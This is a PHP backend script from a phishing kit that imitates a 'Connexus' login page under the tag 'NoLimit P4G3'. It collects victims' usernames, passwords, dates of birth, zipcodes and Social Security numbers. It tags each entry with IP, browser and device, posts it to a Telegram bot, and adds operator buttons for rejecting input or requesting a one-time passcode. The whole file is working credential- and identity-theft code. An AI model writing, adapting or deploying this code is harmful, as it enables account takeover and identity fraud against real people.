<?php
require_once 'admin.php';
session_start();

if (!isset($_SESSION['unique_id'])) {
    $_SESSION['unique_id'] = bin2hex(random_bytes(12));
}
$uniqueId = $_SESSION['unique_id'];

function getBrowserInfo($userAgent) {
    if (strpos($userAgent, 'Firefox') !== false) return 'Firefox';
    if (strpos($userAgent, 'Chrome') !== false) return 'Chrome';
    if (strpos($userAgent, 'Safari') !== false) return 'Safari';
    if (strpos($userAgent, 'Opera') !== false || strpos($userAgent, 'OPR') !== false) return 'Opera';
    if (strpos($userAgent, 'Edge') !== false) return 'Microsoft Edge';
    if (strpos($userAgent, 'Trident') !== false) return 'Internet Explorer';
    return 'Unknown';
}

function getDeviceInfo($userAgent) {
    if (strpos($userAgent, 'iPhone') !== false) return 'iPhone';
    if (strpos($userAgent, 'iPad') !== false) return 'iPad';
    if (strpos($userAgent, 'Android') !== false) {
        if (strpos($userAgent, 'Samsung') !== false) return 'Samsung';
        return 'Android';
    }
    if (strpos($userAgent, 'Windows NT') !== false) return 'Windows Desktop';
    if (strpos($userAgent, 'Macintosh') !== false) return 'Mac Desktop';
    return 'Unknown Device';
}

$userAgent = $_SERVER['HTTP_USER_AGENT'];
$browserInfo = getBrowserInfo($userAgent);
$deviceInfo = getDeviceInfo($userAgent);
$userIp = $_SERVER['REMOTE_ADDR'];

header('Content-Type: application/json');
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (strpos($contentType, 'application/json') !== false) {
        $data = json_decode(file_get_contents("php://input"), true);
    } else {
        $data = $_POST;
    }

    $username  = isset($data['username'])    ? htmlspecialchars($data['username'])    : '';
    $password  = isset($data['password'])    ? htmlspecialchars($data['password'])    : '';
    $dob       = isset($data['dob'])         ? htmlspecialchars($data['dob'])         : '';
    $zipcode   = isset($data['zipcode'])     ? htmlspecialchars($data['zipcode'])     : '';
    $ssn       = isset($data['ssn'])         ? htmlspecialchars($data['ssn'])         : '';

    if ($username && $password && !$dob && !$zipcode && !$ssn) {
        $message  = "| + NoLimit P4G3 + |\n";
        $message .= "Connexus L0G!N \n\n";
        $message .= "ID: #$uniqueId\n";
        $message .= "--------------------\n";
        $message .= "User: $username\n";
        $message .= "Pass: $password\n";
        $message .= "IP: $userIp\n";
        $message .= "Browser: $browserInfo\n";
        $message .= "Device: $deviceInfo\n";

        $inlineKeyboard = [
            'inline_keyboard' => [
                [
                    ['text' => 'Reject', 'url' => DOMAIN . "/update-input.php?action=REJECT&user=" . urlencode($username)],
                    ['text' => 'OTP', 'url' => DOMAIN . "/update-status.php?action=OTP&user=" . urlencode($username)]
                ]
            ]
        ];
    } elseif ($dob && $zipcode && !$username && !$password && !$ssn) {
        $message  = "| + NoLimit P4G3 + |\n";
        $message .= "Connexus ADDITIONAL INFO \n\n";
        $message .= "ID: #$uniqueId\n";
        $message .= "--------------------\n";
        $message .= "Date of Birth: $dob\n";
        $message .= "Zipcode: $zipcode\n";
        $message .= "IP: $userIp\n";
        $message .= "Browser: $browserInfo\n";
        $message .= "Device: $deviceInfo\n";

        $inlineKeyboard = null;
    } elseif ($ssn && !$username && !$password && !$dob && !$zipcode) {
        $message  = "| + NoLimit P4G3 + |\n";
        $message .= "Connexus SSN INFO \n\n";
        $message .= "ID: #$uniqueId\n";
        $message .= "--------------------\n";
        $message .= "SSN: $ssn\n";
        $message .= "IP: $userIp\n";
        $message .= "Browser: $browserInfo\n";
        $message .= "Device: $deviceInfo\n";

        $inlineKeyboard = [
            'inline_keyboard' => [
                [
                    ['text' => 'Reject', 'url' => DOMAIN . "/update-input.php?action=REJECT&user=" . urlencode($uniqueId)],
                    ['text' => 'Accept', 'url' => DOMAIN . "/update-input.php?action=ACCEPT&user=" . urlencode($uniqueId)]
                ]
            ]
        ];
    } else {
        http_response_code(400);
        echo json_encode(['status' => 'error', 'message' => 'Invalid request format.']);
        exit;
    }

    $telegramUrl = "https://api.telegram.org/bot" . BOT_TOKEN . "/sendMessage";
    $telegramData = [
        'chat_id'    => CHAT_ID,
        'text'       => $message
    ];
    
    if ($inlineKeyboard !== null) {
        $telegramData['reply_markup'] = json_encode($inlineKeyboard);
    }
    $options = [
        'http' => [
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($telegramData)
        ]
    ];
    $context = stream_context_create($options);
    $result = file_get_contents($telegramUrl, false, $context);
    if ($result === FALSE) {
        error_log("Failed to send login request to Telegram.");
        echo json_encode(['status' => 'error', 'message' => 'Failed to send login request.']);
        exit;
    }

    echo json_encode(['status' => 'pending', 'message' => 'Login request sent for approval.']);
    exit;
} else {
    http_response_code(405);
    echo json_encode(['status' => 'error', 'message' => 'Method not allowed.']);
    exit;
} 